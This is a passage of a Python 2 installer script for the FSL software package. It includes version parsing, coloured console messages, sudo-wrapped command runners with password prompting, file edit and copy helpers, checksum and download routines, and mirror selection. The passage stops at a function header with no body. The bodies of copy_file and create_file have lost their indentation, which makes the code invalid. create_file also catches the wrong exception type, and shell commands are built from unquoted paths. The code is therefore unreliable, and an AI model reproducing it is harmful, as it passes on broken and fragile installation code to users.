    # Python 2 has no subprocess.DEVNULL; emulate it with /dev/null.
    DEVNULL = open(os.devnull, 'wb')
locale.setlocale(locale.LC_ALL, '')
# Preferred terminal encoding, used when emitting user-visible text.
code = locale.getpreferredencoding()
try:
    import json
    HAS_JSON = True
except Exception:
    # json is optional; features that need it check HAS_JSON first.
    HAS_JSON = False
# Console status codes for reporting install steps.
fsli_C_FAILED = 1
fsli_C_OK = 2
fsli_C_SKIP = 4
fsli_C_WARN = 3
# Installation states relative to the available release.
CURRENT = 0
UPDATE = 1
UPGRADE = 2
# Shell families recognised when configuring environment setup scripts.
BOURNE_SHELLS = ('sh', 'bash', 'zsh', 'ksh', 'dash', )
C_SHELLS = ('csh', 'tcsh', )
class Version(object):
    """Dotted version string: major[.minor[.patch[.hotfix]]].

    Anything after a ':' in the input is ignored. Every dotted component
    must be numeric, otherwise ValueError is raised; missing components
    default to 0. Instances order like their (major, minor, patch, hotfix)
    tuples, and comparisons with non-Version objects are refused.
    """

    def __init__(self, version_string):
        # Strip an optional ':suffix' before parsing.
        if ':' in version_string:
            version_string = version_string.split(':')[0]
        parts = version_string.split('.')
        if any(not part.isdigit() for part in parts):
            raise ValueError('Bad version string')
        # Pad with zeros so up to four components are always available.
        numbers = [int(part) for part in parts] + [0, 0, 0]
        self.major = numbers[0]
        self.minor = numbers[1]
        self.patch = numbers[2]
        self.hotfix = numbers[3]

    def _key(self):
        # Comparison helper: versions order exactly like these tuples.
        return (self.major, self.minor, self.patch, self.hotfix)

    def __repr__(self):
        return "Version(%s,%s,%s,%s)" % self._key()

    def __str__(self):
        # The hotfix component is shown only when non-zero.
        if self.hotfix == 0:
            return "%s.%s.%s" % (self.major, self.minor, self.patch)
        return "%s.%s.%s.%s" % self._key()

    def __eq__(self, other):
        if not isinstance(other, Version):
            return NotImplemented
        return self._key() == other._key()

    def __ne__(self, other):
        if not isinstance(other, Version):
            return NotImplemented
        return self._key() != other._key()

    def __lt__(self, other):
        if not isinstance(other, Version):
            return NotImplemented
        return self._key() < other._key()

    def __gt__(self, other):
        if not isinstance(other, Version):
            return NotImplemented
        return self._key() > other._key()

    def __le__(self, other):
        if not isinstance(other, Version):
            return NotImplemented
        return self._key() <= other._key()

    def __ge__(self, other):
        if not isinstance(other, Version):
            return NotImplemented
        return self._key() >= other._key()

    def __cmp__(self, other):
        # Python 2 three-way comparison kept for compatibility.
        if not isinstance(other, Version):
            return NotImplemented
        if self._key() < other._key():
            return -1
        if self._key() > other._key():
            return 1
        return 0
# Release version of this installer script.
version = Version('3.0.18')
def memoize(f):
    """Wrap `f` so repeated calls with the same arguments hit a cache.

    The cache is keyed on (f, positional args, kwargs) and exposed as
    f.cache so callers can inspect or clear it. Arguments must be hashable.
    """
    cache = f.cache = {}

    def wrapper(*args, **kwargs):
        key = (f, tuple(args), frozenset(kwargs.items()))
        try:
            return cache[key]
        except KeyError:
            result = cache[key] = f(*args, **kwargs)
            return result
    return wrapper
class InstallError(Exception):
    """Raised when an installation step fails irrecoverably."""
    pass
class shell_colours(object):
    """ANSI escape sequences used for coloured terminal output."""
    default = '\033[0m'       # reset all attributes
    rfg_kbg = '\033[91m'      # bright red foreground
    gfg_kbg = '\033[92m'      # bright green foreground
    yfg_kbg = '\033[93m'      # bright yellow foreground
    mfg_kbg = '\033[95m'      # bright magenta foreground
    yfg_bbg = '\033[104;93m'  # bright yellow on bright blue background
    bfg_kbg = '\033[34m'      # blue foreground
    bold = '\033[1m'
class MsgUser(object):
    """Console messaging helpers with class-wide debug/quiet switches.

    Python 2 module: uses print statements. Quiet mode suppresses all
    output except failed(); debug output goes to stderr.
    """
    __debug = False
    __quiet = False

    @classmethod
    def debugOn(cls):
        cls.__debug = True

    @classmethod
    def debugOff(cls):
        cls.__debug = False

    @classmethod
    def quietOn(cls):
        cls.__quiet = True

    @classmethod
    def quietOff(cls):
        cls.__quiet = False

    @classmethod
    def isquiet(cls):
        return cls.__quiet

    @classmethod
    def isdebug(cls):
        return cls.__debug

    @classmethod
    def debug(cls, message, newline=True):
        # Debug goes to stderr so it can be separated from normal output.
        if cls.__debug:
            mess = str(message)
            if newline:
                mess += "\n"
            sys.stderr.write(mess)

    @classmethod
    def message(cls, msg):
        if cls.__quiet:
            return
        print msg

    @classmethod
    def question(cls, msg):
        # Trailing comma keeps the cursor on the prompt line (Python 2).
        print msg,

    @classmethod
    def skipped(cls, msg):
        if cls.__quiet:
            return
        print "".join(
            (shell_colours.mfg_kbg, "[Skipped] ", shell_colours.default, msg))

    @classmethod
    def ok(cls, msg):
        if cls.__quiet:
            return
        print "".join(
            (shell_colours.gfg_kbg, "[OK] ", shell_colours.default, msg))

    @classmethod
    def failed(cls, msg):
        # Failures are always shown, even in quiet mode.
        print "".join(
            (shell_colours.rfg_kbg, "[FAILED] ", shell_colours.default, msg))

    @classmethod
    def warning(cls, msg):
        if cls.__quiet:
            return
        print "".join(
            (shell_colours.bfg_kbg,
             shell_colours.bold,
             "[Warning]",
             shell_colours.default, " ", msg))
class Progress_bar(object):
    '''Console progress indicator with three styles: a hash bar
    (default), "current/max - N%" (numeric=True) or a bare percentage
    (percentage=True).  Respects MsgUser quiet mode.'''
    def __init__(self, x=0, y=0, mx=1, numeric=False, percentage=False):
        # x and y are accepted but never read by update()
        self.x = x
        self.y = y
        self.width = 50  # NOTE(review): unused - the hash bar is 'percent' chars wide
        self.current = 0
        self.max = mx
        self.numeric = numeric
        self.percentage = percentage
    def update(self, reading):
        '''Redraw the indicator for reading (expected range 0..max).'''
        if MsgUser.isquiet():
            return
        percent = int(round(reading * 100.0 / self.max))
        cr = '\r'
        if not self.numeric and not self.percentage:
            bar = '#' * int(percent)
        elif self.numeric:
            bar = "/".join(
                (str(reading),
                 str(self.max))) + ' - ' + str(percent) + "%\033[K"
        elif self.percentage:
            bar = "%s%%" % (percent)
        sys.stdout.write(cr)
        sys.stdout.write(bar)
        sys.stdout.flush()
        self.current = percent
        if percent == 100:
            # Finished: blank out the bar (or emit the final value)
            sys.stdout.write(cr)
            if not self.numeric and not self.percentage:
                sys.stdout.write(" " * int(percent))
                sys.stdout.write(cr)
                sys.stdout.flush()
            elif self.numeric:
                sys.stdout.write(" " * (len(str(self.max))*2 + 8))
                sys.stdout.write(cr)
                sys.stdout.flush()
            elif self.percentage:
                sys.stdout.write("100%")
                sys.stdout.write(cr)
                sys.stdout.flush()
def temp_file_name(mode='r', close=False):
    '''Create a temporary file with mkstemp and return (file object, name).

    Opened read-only unless *mode* says otherwise; when *close* is True
    the object is closed before being returned.  The object comes from
    os.fdopen, so it carries no useful file name of its own.'''
    (handle, fname) = tempfile.mkstemp()
    fobj = os.fdopen(handle, mode)
    if close:
        fobj.close()
    return (fobj, fname)
class RunCommandError(Exception):
    '''Raised when an external command exits with a non-zero status.'''
    pass
class Spinner(object):
    '''Animated console spinner shown while a long command runs.'''
    # Shared cycling iterator over the four spinner glyphs
    spinner = itertools.cycle(('-', '\\', '|', '/', ))
    busy = False
    delay = 0.2
    def __init__(self, delay=None, quiet=False):
        # delay: seconds between frames; quiet: suppress the spinner entirely
        if delay:
            try:
                self.delay = float(delay)
            except ValueError:
                pass
        self.quiet = quiet
    def spin_it(self):
        '''Animation loop; runs in a worker thread until busy is cleared.'''
        while self.busy:
            # Python 2 iterator API (.next())
            sys.stdout.write(self.spinner.next())
            sys.stdout.flush()
            time.sleep(self.delay)
            sys.stdout.write('\b')
            sys.stdout.flush()
    def start(self):
        '''Begin spinning in a background thread (no-op when quiet).'''
        if not self.quiet:
            self.busy = True
            threading.Thread(target=self.spin_it).start()
    def stop(self):
        '''Stop the animation and wait one frame so the thread notices.'''
        self.busy = False
        time.sleep(self.delay)
def run_cmd_dropstdout(command, as_root=False):
    '''Run the command, discarding stdout.

    When as_root is True and we are not already root the command is run
    via ``sudo -S`` with the cached password fed on stdin.  Only stderr
    is captured; raises RunCommandError on a non-zero exit status.'''
    command_line = shlex.split(command)
    if as_root and os.getuid() != 0:
        try:
            sudo_pwd = get_sudo_pwd()
        except SudoPasswordError:
            raise RunCommandError(
                "Unable to get valid administrator's password")
        # Build "sudo -S <command>" so the password can be sent on stdin
        command_line.insert(0, '-S')
        command_line.insert(0, 'sudo')
    else:
        sudo_pwd = ''
    try:
        my_spinner = Spinner(quiet=MsgUser.isquiet())
        my_spinner.start()
        cmd = Popen(command_line, stdin=PIPE, stdout=None, stderr=PIPE)
        if sudo_pwd:
            cmd.stdin.write(sudo_pwd + '\n')
            cmd.stdin.flush()
        (_, error) = cmd.communicate()
    except Exception:
        raise
    finally:
        # Always stop the spinner, even if the command blew up
        my_spinner.stop()
    if cmd.returncode:
        MsgUser.debug("An error occured (%s, %s)" % (cmd.returncode, error))
        raise RunCommandError(error)
def run_cmd(command, as_root=False):
    '''Run the command and return its captured stdout.

    When as_root is True and we are not already root the command is run
    via ``sudo -S`` with the cached password fed on stdin.  A spinner
    is displayed while the command runs.  Raises RunCommandError
    (carrying stderr) on a non-zero exit status.'''
    command_line = shlex.split(command)
    if as_root and os.getuid() != 0:
        try:
            sudo_pwd = get_sudo_pwd()
        except SudoPasswordError:
            raise RunCommandError(
                "Unable to get valid administrator's password")
        # Build "sudo -S <command>" so the password can be sent on stdin
        command_line.insert(0, '-S')
        command_line.insert(0, 'sudo')
    else:
        sudo_pwd = ''
    MsgUser.debug("Will call %s" % (command_line))
    try:
        my_spinner = Spinner(quiet=MsgUser.isquiet())
        my_spinner.start()
        cmd = Popen(command_line, stdin=PIPE, stdout=PIPE, stderr=PIPE)
        if sudo_pwd:
            cmd.stdin.write(sudo_pwd + '\n')
            cmd.stdin.flush()
        (output, error) = cmd.communicate()
    except Exception:
        raise
    finally:
        # Always stop the spinner, even if the command blew up
        my_spinner.stop()
    if cmd.returncode:
        MsgUser.debug("An error occured (%s, %s)" % (cmd.returncode, error))
        raise RunCommandError(error)
    MsgUser.debug("Command completed successfully (%s)" % (output))
    return output
def run_cmd_displayoutput(command, as_root=False):
    '''Run the command, streaming its output to our stdout/stderr.

    Uses ``sudo -S`` (password on stdin) when as_root is True and we
    are not already root; otherwise runs the command directly with
    subprocess.call.  Raises RunCommandError (carrying the exit code)
    on failure.'''
    command_line = shlex.split(command)
    if as_root and os.getuid() != 0:
        try:
            sudo_pwd = get_sudo_pwd()
        except SudoPasswordError:
            raise RunCommandError(
                "Unable to get valid administrator's password")
        # Build "sudo -S <command>" so the password can be sent on stdin
        command_line.insert(0, '-S')
        command_line.insert(0, 'sudo')
        MsgUser.debug("Will call %s" % (command_line))
        cmd = Popen(
            command_line,
            stdin=PIPE, stdout=sys.stdout, stderr=sys.stderr)
        if sudo_pwd:
            cmd.stdin.write(sudo_pwd + '\n')
            cmd.stdin.flush()
        cmd.communicate()
        return_code = cmd.returncode
    else:
        return_code = call(command_line)
    if return_code:
        MsgUser.debug("An error occured (%s)" % (return_code))
        raise RunCommandError(return_code)
    MsgUser.debug("Command completed successfully")
def check_sudo(sudo_pwd):
    '''Feed sudo_pwd to ``sudo -S true`` and report whether it was accepted.'''
    command_line = ['sudo', '-S', 'true']
    MsgUser.debug("Checking sudo password")
    proc = Popen(
        command_line,
        stdin=PIPE,
        stdout=DEVNULL,
        stderr=DEVNULL
    )
    proc.stdin.write(sudo_pwd + '\n')
    proc.stdin.flush()
    proc.communicate()
    return proc.returncode == 0
class SudoPasswordError(Exception):
    '''Raised when a valid sudo password cannot be obtained.'''
    pass
@memoize
def get_sudo_pwd():
    '''Get the sudo password from the user.

    Memoized, so the user is prompted at most once per run.  Allows
    three attempts, verifying each with check_sudo; raises
    SudoPasswordError when none succeeds.'''
    MsgUser.message("We require your password to continue...")
    attempts = 0
    valid = False
    while attempts < 3 and not valid:
        sudo_pwd = getpass.getpass('password: ')
        valid = check_sudo(sudo_pwd)
        if not valid:
            MsgUser.failed("Incorrect password")
            attempts += 1
    if not valid:
        raise SudoPasswordError()
    return sudo_pwd
class DeletionRefused(Exception):
    '''Raised when safe_delete is asked to remove a protected path.'''
    pass
class SafeDeleteError(Exception):
    '''Raised when the underlying delete command fails.'''
    pass
def safe_delete(fs_object, as_root=False):
    '''Delete file/folder, becoming root if necessary.
    Run some sanity checks on object.

    Raises DeletionRefused for protected system paths and
    SafeDeleteError if the rm command fails.'''
    # Paths we must never delete, however we were called.
    banned_items = ['/', '/usr', '/usr/bin', '/usr/local', '/bin',
                    '/sbin', '/opt', '/Library', '/System', '/System/Library',
                    '/var', '/tmp', '/var/tmp', '/lib', '/lib64', '/Users',
                    '/home', '/Applications', '/private', '/etc', '/dev',
                    '/Network', '/net', '/proc']
    if os.path.isdir(fs_object):
        del_opts = "-rf"
    else:
        del_opts = '-f'
    if fs_object in banned_items:
        raise DeletionRefused('Will not delete %s!' % (fs_object))
    command_line = " ".join(('rm', del_opts, fs_object))
    try:
        result = run_cmd(command_line, as_root)
    except RunCommandError, e:
        raise SafeDeleteError(str(e))
    return result
class MoveError(Exception):
    '''Raised when the mv command fails.'''
    pass
def move(source, target, as_root):
    '''Move source to target with ``mv`` (via sudo when as_root).

    Raises MoveError if the command fails.'''
    try:
        run_cmd_dropstdout(" ".join(('mv', source, target)), as_root)
    except RunCommandError, e:
        raise MoveError(str(e))
class IsDirectoryError(Exception):
    '''Raised when a file operation is given a directory by mistake.'''
    pass
class CopyFileError(Exception):
    '''Raised when the cp command fails.'''
    pass
def copy_file(fname, destination, as_root):
'''Copy a file using sudo if necessary'''
MsgUser.debug("Copying %s to %s (as root? %s)" % (
fname, destination, as_root))
if os.path.isdir(fname):
raise IsDirectoryError('Source (%s) is a director!' % (fname))
if os.path.isdir(destination):
# Ensure that copying into a folder we have a terminating slash
destination = destination.rstrip('/') + "/"
copy_opts = '-p'
command_line = " ".join(('cp', copy_opts, fname, destination))
try:
result = run_cmd(command_line, as_root)
except RunCommandError, e:
raise CopyFileError(str(e))
return result
def file_contains(fname, search_for):
    '''Equivalent of grep - True when search_for occurs (as a literal
    string) anywhere in file fname.'''
    regex = compile(escape(search_for))
    found = False
    MsgUser.debug("In file_contains.")
    MsgUser.debug("Looking for %s in %s." % (search_for, fname))
    f = open(fname, 'r')
    try:
        for l in f:
            if regex.search(l):
                found = True
                break
    finally:
        # BUG FIX: close the handle even if iteration raises; the
        # original leaked the descriptor on an I/O error.
        f.close()
    return found
def file_contains_1stline(fname, search_for):
    '''Equivalent of grep - returns the first line of fname containing
    the literal string search_for, or '' when absent.'''
    regex = compile(escape(search_for))
    found = ''
    MsgUser.debug("In file_contains_1stline.")
    MsgUser.debug("Looking for %s in %s." % (search_for, fname))
    f = open(fname, 'r')
    try:
        for l in f:
            if regex.search(l):
                found = l
                break
    finally:
        # BUG FIX: close the handle even if iteration raises; the
        # original leaked the descriptor on an I/O error.
        f.close()
    return found
def line_string_replace(line, search_for, replace_with):
    '''Replace literal occurrences of search_for in line with replace_with.'''
    pattern = escape(search_for)
    replacement = escape(replace_with)
    return sub(pattern, replacement, line)
def line_starts_replace(line, search_for, replace_with):
    '''Swap the whole line for replace_with (plus newline) when it
    begins with search_for; otherwise return it unchanged.'''
    if not line.startswith(search_for):
        return line
    return replace_with + '\n'
class MoveFileError(Exception):
    '''Raised when move_file cannot relocate a file.'''
    pass
def move_file(from_file, to_file, requires_root=False):
    '''Move a file, using /bin/cp via sudo if requested.
    Will work around known bugs in python.

    Raises MoveFileError when neither route succeeds.'''
    if requires_root:
        # Copy with /bin/cp under sudo, then remove the source ourselves.
        try:
            run_cmd_dropstdout(" ".join(
                ("/bin/cp", from_file, to_file)), as_root=True)
        except RunCommandError, e:
            MsgUser.debug(e)
            raise MoveFileError("Failed to move %s (%s)" % (from_file, str(e)))
        os.remove(from_file)
    else:
        try:
            move(from_file, to_file, requires_root)
        except OSError, e:
            # Handle bug in some python versions on OS X writing to NFS home
            # folders, Python tries to preserve file flags but NFS can't do
            # this. It fails to catch this error and ends up leaving the file
            # in the original and new locations!
            if e.errno == 45:
                # errno 45 - presumably EOPNOTSUPP on OS X (TODO confirm)
                # Check if new file has been created:
                if os.path.isfile(to_file):
                    # Check if original exists
                    if os.path.isfile(from_file):
                        # Destroy original and continue
                        os.remove(from_file)
                else:
                    # The move never happened - fall back to /bin/cp + remove
                    try:
                        run_cmd_dropstdout("/bin/cp %s %s" % (
                            from_file, to_file), as_root=False)
                    except RunCommandError, e:
                        MsgUser.debug(e)
                        raise MoveFileError("Failed to copy from %s (%s)" % (
                            from_file, str(e)))
                    os.remove(from_file)
            else:
                raise
        except Exception:
            raise
class EditFileError(Exception):
    '''Raised when edit_file cannot rewrite the target file.'''
    pass
def edit_file(fname, edit_function, search_for, replace_with, requires_root):
    '''Search for a simple string in the file given and replace
    it with the new text.

    edit_function(line, search_for, replace_with) is applied to every
    line; the result is written to a temp file which then replaces the
    original (via sudo when requires_root).  Raises EditFileError on
    any failure.'''
    try:
        (tmpfile, tmpfname) = temp_file_name(mode='w')
        src = open(fname)
        for line in src:
            line = edit_function(line, search_for, replace_with)
            tmpfile.write(line)
        src.close()
        tmpfile.close()
        try:
            move_file(tmpfname, fname, requires_root)
        except MoveFileError, e:
            MsgUser.debug(e)
            # Clean up the temporary copy before reporting failure
            os.remove(tmpfname)
            raise EditFileError("Failed to edit %s (%s)" % (fname, str(e)))
    except IOError, e:
        MsgUser.debug(e.strerror)
        raise EditFileError("Failed to edit %s (%s)" % (fname, str(e)))
    MsgUser.debug("Modified %s (search %s; replace %s)." % (
        fname, search_for, replace_with))
class AddToFileError(Exception):
    '''Raised when add_to_file cannot append to the target file.'''
    pass
def add_to_file(fname, add_lines, requires_root):
    '''Add lines to end of a file.

    add_lines may be a string (split on newlines) or a sequence of
    lines.  The file is rewritten via a temp copy; raises
    AddToFileError on failure.'''
    if isinstance(add_lines, basestring):
        add_lines = add_lines.split('\n')
    try:
        (tmpfile, tmpfname) = temp_file_name(mode='w')
        src = open(fname)
        for line in src:
            tmpfile.write(line)
        src.close()
        # Blank line separates the appended block from existing content
        tmpfile.write('\n')
        for line in add_lines:
            tmpfile.write(line)
            tmpfile.write('\n')
        tmpfile.close()
        try:
            move_file(tmpfname, fname, requires_root)
        except MoveFileError, e:
            os.remove(tmpfname)
            MsgUser.debug(e)
            raise AddToFileError("Failed to add to file %s (%s)" % (
                fname, str(e)))
    except IOError, e:
        MsgUser.debug(e.strerror + tmpfname + fname)
        raise AddToFileError("Failed to add to file %s" % (fname))
    MsgUser.debug("Modified %s (added %s)" % (fname, '\n'.join(add_lines)))
class CreateFileError(Exception):
    '''Raised when create_file cannot write the target file.'''
    pass
def create_file(fname, lines, requires_root):
'''Create a new file containing lines given'''
if isinstance(lines, basestring):
lines = lines.split('\n')
try:
(tmpfile, tmpfname) = temp_file_name(mode='w')
for line in lines:
tmpfile.write(line)
tmpfile.write('\n')
tmpfile.close()
try:
move_file(tmpfname, fname, requires_root)
except CreateFileError, e:
os.remove(tmpfname)
MsgUser.debug(e)
raise CreateFileError("Failed to edit %s (%s)" % (fname, str(e)))
except IOError, e:
MsgUser.debug(e.strerror)
raise CreateFileError("Failed to create %s" % (fname))
MsgUser.debug("Created %s (added %s)" % (fname, '\n'.join(lines)))
class UnsupportedOs(Exception):
    '''Raised when no FSL build exists for this platform.'''
    pass
class Host(object):
    '''Work out which platform we are running on'''
    # All attributes are computed once, at class-definition time.
    o_s = platform.system().lower()
    arch = platform.machine()
    applever = ''
    os_type = os.name
    supported = True
    if o_s == 'darwin':
        vendor = 'apple'
        version = Version(platform.release())  # Darwin kernel version
        (applever, _, _) = platform.mac_ver()
        glibc = ''
    elif o_s == 'linux':
        if hasattr(platform, 'linux_distribution'):
            # We have a modern python (>2.4)
            (vendor, version, _) = platform.linux_distribution(
                full_distribution_name=0)
        else:
            (vendor, version, _) = platform.dist()
        vendor = vendor.lower()
        version = Version(version)
        glibc = platform.libc_ver()[1]
    else:
        # Anything other than Linux/OS X is unsupported
        supported = False
    # Translate machine architecture into a word size
    if arch == 'x86_64':
        bits = '64'
    elif arch == 'i686':
        bits = '32'
    elif arch == 'Power Macintosh':
        bits = ''
def is_writeable(location):
    '''Check if we can write to the location given.

    Tries to create (and auto-delete) a temp file there; permission
    errors yield False, any other OSError propagates.'''
    writeable = True
    try:
        tfile = tempfile.NamedTemporaryFile(mode='w+b', dir=location)
        tfile.close()
    except OSError, e:
        if e.errno == errno.EACCES or e.errno == errno.EPERM:
            writeable = False
        else:
            raise
    return writeable
def is_writeable_as_root(location):
    '''Check if sudo can write to a given location.

    Copies a scratch file there with sudo and removes it again; returns
    True only if both steps succeed.'''
    # This requires us to use sudo
    (f, fname) = temp_file_name(mode='w')
    f.write("FSL")
    f.close()
    result = False
    tmptarget = '/'.join((location, os.path.basename(fname)))
    MsgUser.debug(" ".join(('/bin/cp', fname, tmptarget)))
    try:
        run_cmd_dropstdout(" ".join(('/bin/cp',
                                     fname, tmptarget)), as_root=True)
        result = True
        os.remove(fname)
        # Clean up the probe file we just copied in
        run_cmd_dropstdout(" ".join(('/bin/rm',
                                     '-f', tmptarget)), as_root=True)
    except RunCommandError, e:
        MsgUser.debug(e)
        os.remove(fname)
        result = False
    MsgUser.debug("Writeable as root? %s" % (result))
    return result
class ChecksumCalcError(Exception):
    '''Raised when a file checksum cannot be computed.'''
    pass
def sha256File(filename, bs=1048576):
    '''Returns the sha256 sum of the given file.

    Reads in bs-byte blocks, driving a progress bar.  On ancient
    pythons without hashlib, shells out to sha256sum instead; raises
    ChecksumCalcError when that also fails.'''
    MsgUser.message("Checking FSL package")
    try:
        import hashlib
        f = open(filename, 'rb')
        pb = Progress_bar(mx=os.path.getsize(filename), percentage=True)
        pb.position = 0
        fhash = hashlib.sha256()
        data = f.read(bs)
        while len(data) == bs:
            fhash.update(data)
            data = f.read(bs)
            pb.position += len(data)
            pb.update(pb.position)
        # Fold in the final (short) block
        fhash.update(data)
        f.close()
        return fhash.hexdigest()
    except ImportError:
        # No SHA256 support on python pre-2.5 so call the OS to do it.
        try:
            result = run_cmd(" ".join(('sha256sum', '-b', filename)))
            return parsesha256sumfile(result)
        except RunCommandError, e:
            MsgUser.debug("SHA256 calculation error %s" % (str(e)))
            raise ChecksumCalcError
def parsesha256sumfile(sha256string):
    '''Extract the digest from `sha256sum -b`/`shasum -a 256` output,
    which has the form "<hexdigest> *<filename>".'''
    (digest, _) = sha256string.split("*")
    return digest.strip()
def md5File(filename, bs=1048576):
    '''Returns the MD5 sum of the given file.

    Reads in bs-byte blocks, driving a progress bar; falls back to the
    old md5 module on pythons without hashlib.'''
    MsgUser.message("Checking FSL package")
    try:
        import hashlib
        fhash = hashlib.md5()
    except ImportError:
        # Python pre-2.5: hashlib unavailable, use the md5 module
        import md5
        fhash = md5.new()
    f = open(filename, 'rb')
    pb = Progress_bar(mx=os.path.getsize(filename), percentage=True)
    pb.position = 0
    data = f.read(bs)
    while len(data) == bs:
        fhash.update(data)
        data = f.read(bs)
        pb.position += len(data)
        pb.update(pb.position)
    # Fold in the final (short) block
    fhash.update(data)
    f.close()
    return fhash.hexdigest()
def file_checksum(filename, chktype='sha256'):
    '''Compute the checksum of filename using chktype ('sha256' or
    'md5'); raises ChecksumCalcError for anything else.'''
    if chktype == 'sha256':
        return sha256File(filename)
    elif chktype == 'md5':
        return md5File(filename)
    raise ChecksumCalcError('Unrecognised checksum type')
class OpenUrlError(Exception):
    '''Raised when a download URL cannot be opened.'''
    pass
def open_url(url, start=0, timeout=20):
    '''Open url for reading, optionally resuming at byte offset start.

    Returns the urllib2 response object; raises OpenUrlError with a
    user-readable message on any failure.'''
    socket.setdefaulttimeout(timeout)
    MsgUser.debug("Attempting to download %s." % (url))
    try:
        req = urllib2.Request(url)
        if start != 0:
            # Ask the server for the remainder only (resume support)
            req.headers['Range'] = 'bytes=%s-' % (start)
        rf = urllib2.urlopen(req)
    except urllib2.HTTPError, e:
        MsgUser.debug("%s %s" % (url, e.msg))
        raise OpenUrlError("Cannot find file %s on server (%s). "
                           "Try again later." % (url, e.msg))
    except urllib2.URLError, e:
        if type(e.reason) != str:
            # NOTE(review): this local 'errno' shadows any errno module
            # import and stays unset if e.reason.args is empty - verify.
            errno = e.reason.args[0]
            if len(e.reason.args) > 1:
                message = e.reason.args[1]
                # give up on trying to identify both the errno and message
            else:
                message = e.reason.args
            if errno == 8:
                # Bad host name
                MsgUser.debug("%s %s" % (url,
                                         "Unable to find FSL download "
                                         "server in the DNS"))
            else:
                # Other error
                MsgUser.debug("%s %s" % (url, message))
        else:
            message = str(e.reason)
        raise OpenUrlError(
            "Cannot find %s (%s). Try again later." % (url, message))
    except socket.timeout, e:
        MsgUser.debug(e)
        raise OpenUrlError("Failed to contact FSL web site. Try again later.")
    return rf
class DownloadFileError(Exception):
    '''Raised when a download cannot be completed.'''
    pass
def download_file(url, localf, timeout=20):
    '''Get a file from the url given storing it in the local file specified.

    Makes up to five attempts, resuming each retry from the bytes
    already received (HTTP Range).  Raises DownloadFileError if the
    advertised size is never reached.'''
    try:
        rf = open_url(url, 0, timeout)
    except OpenUrlError, e:
        raise DownloadFileError(str(e))
    metadata = rf.info()
    rf_size = int(metadata.getheaders("Content-Length")[0])
    dl_size = 0
    block = 16384
    x = 0
    y = 0
    pb = Progress_bar(x, y, rf_size, numeric=True)
    for attempt in range(1, 6):
        # Attempt download 5 times before giving up
        pause = timeout
        try:
            try:
                # 'ab' so a resumed attempt appends to what we already have
                lf = open(localf, 'ab')
            except Exception:
                raise DownloadFileError("Failed to create temporary file.")
            while True:
                buf = rf.read(block)
                if not buf:
                    break
                dl_size += len(buf)
                lf.write(buf)
                pb.update(dl_size)
            lf.close()
        except (IOError, socket.timeout), e:
            MsgUser.debug(e.strerror)
            MsgUser.message("\nDownload failed re-trying (%s)..." % attempt)
            pause = 0
        if dl_size != rf_size:
            time.sleep(pause)
            MsgUser.message("\nDownload failed re-trying (%s)..." % attempt)
            try:
                # Re-open the connection at the resume offset
                rf = open_url(url, dl_size, timeout)
            except OpenUrlError, e:
                MsgUser.debug(e)
        else:
            break
    if dl_size != rf_size:
        raise DownloadFileError("Failed to download file.")
def build_url_with_protocol(protocol, base, parts):
    '''Assemble "<protocol>://<base>/<part>/<part>..." from the pieces,
    trimming stray slashes from each component.'''
    pieces = [protocol + '://' + base.strip('/')]
    for item in parts:
        pieces.append(item.strip('/'))
    return '/'.join(pieces)
def build_url(parts):
    '''Join URL components with single slashes, trimming stray slashes
    from the edges of every component.'''
    cleaned = [parts[0].strip('/')]
    for item in parts[1:]:
        cleaned.append(item.strip('/'))
    return '/'.join(cleaned)
class SiteNotResponding(Exception):
    '''Raised when a download site cannot be contacted.'''
    pass
def fastest_mirror(main_mirrors, mirrors_file, timeout=20):
    '''Find the fastest mirror for FSL downloads.

    Fetches mirrors_file from the main mirror(s); when several mirrors
    are listed, picks the one with the quickest TCP connect time.
    Raises SiteNotResponding or ServerFailure.'''
    MsgUser.debug("Calculating fastest mirror")
    socket.setdefaulttimeout(timeout)
    # Get the mirror list from the url
    fastestmirrors = {}
    mirrorlist = []
    for m in main_mirrors:
        MsgUser.debug("Trying %s" % (m))
        m_url = '/'.join((m.strip('/'), mirrors_file))
        MsgUser.debug("Attempting to open %s" % (m_url))
        try:
            response = urllib2.urlopen(url=m_url)
        except urllib2.HTTPError, e:
            MsgUser.debug("%s %s" % (m_url, e.msg))
            raise SiteNotResponding(e.msg)
        except urllib2.URLError, e:
            if isinstance(e.reason, socket.timeout):
                MsgUser.debug("Time out trying %s" % (m_url))
                raise SiteNotResponding(m)
            else:
                MsgUser.debug(str(e.reason))
                raise SiteNotResponding(str(e.reason))
        except socket.timeout, e:
            MsgUser.debug(e)
            raise SiteNotResponding(str(e))
        except Exception, e:
            MsgUser.debug("Unhandled exception %s" % (str(e)))
            raise
        else:
            mirrorlist = response.read().strip().split('\n')
            MsgUser.debug("Received the following "
                          "mirror list %s" % (mirrorlist))
            # NOTE(review): 'continue' polls every main mirror and keeps
            # only the last successful list; 'break' may have been
            # intended - confirm before changing.
            continue
    if len(mirrorlist) == 0:
        raise ServerFailure("Cannot find FSL download servers")
    # Check timings from the urls specified
    if len(mirrorlist) > 1:
        for mirror in mirrorlist:
            MsgUser.debug("Trying %s" % (mirror))
            then = time.time()
            if mirror.startswith('http:'):
                serverport = 80
            elif mirror.startswith('https:'):
                serverport = 443
            else:
                raise ServerFailure("Unrecognised protocol")
            try:
                # NOTE(review): 'mirror' is a full URL here, but
                # create_connection expects a bare host name - verify
                # what the mirror list actually contains.
                mysock = socket.create_connection((mirror, serverport),
                                                  timeout)
                pingtime = time.time() - then
                mysock.close()
                fastestmirrors[pingtime] = mirror
                MsgUser.debug("Mirror responded in %s seconds" % (pingtime))
            except socket.gaierror, e:
                MsgUser.debug("%s can't be resolved" % (e))
            except socket.timeout, e:
                MsgUser.debug(e)
        if len(fastestmirrors) == 0:
            raise ServerFailure('Failed to contact any FSL download sites.')
        download_url = fastestmirrors[min(fastestmirrors.keys())]
    else:
        download_url = mirrorlist[0]
    return download_url
# Concept:
# Web app creates the following files:
# fslmirrorlist.txt - contains a list of mirror urls
# fslreleases.json - contains the available maps for oses
# mapping to a download url
# {'installer' {
# 'filename': 'fslinstaller.py',
# 'version': '3.0.0',
# 'date': '02/03/2017',
# 'checksum_type', 'sha256',
# 'checksum'},
# 'linux' : {
# 'centos' : {
# 'x86_64': {
# '6': {
# '5.0.9': {
# 'filename': 'fsl-5.0.9-centos6_64.tar.gz',
# 'version': '5.0.9',
# 'date': '01/02/2017',
# 'checksum_type', 'sha256',
# 'checksum': 'abf645662bcf4453235',
# },
# },
# },
# },
# 'rhel' : {'alias': 'centos'}},
# 'apple' : {
# 'darwin' : {
# 'x86_64': {
# '11': {
# ....
# },
# }
@memoize
def get_web_manifest(download_url, timeout=20):
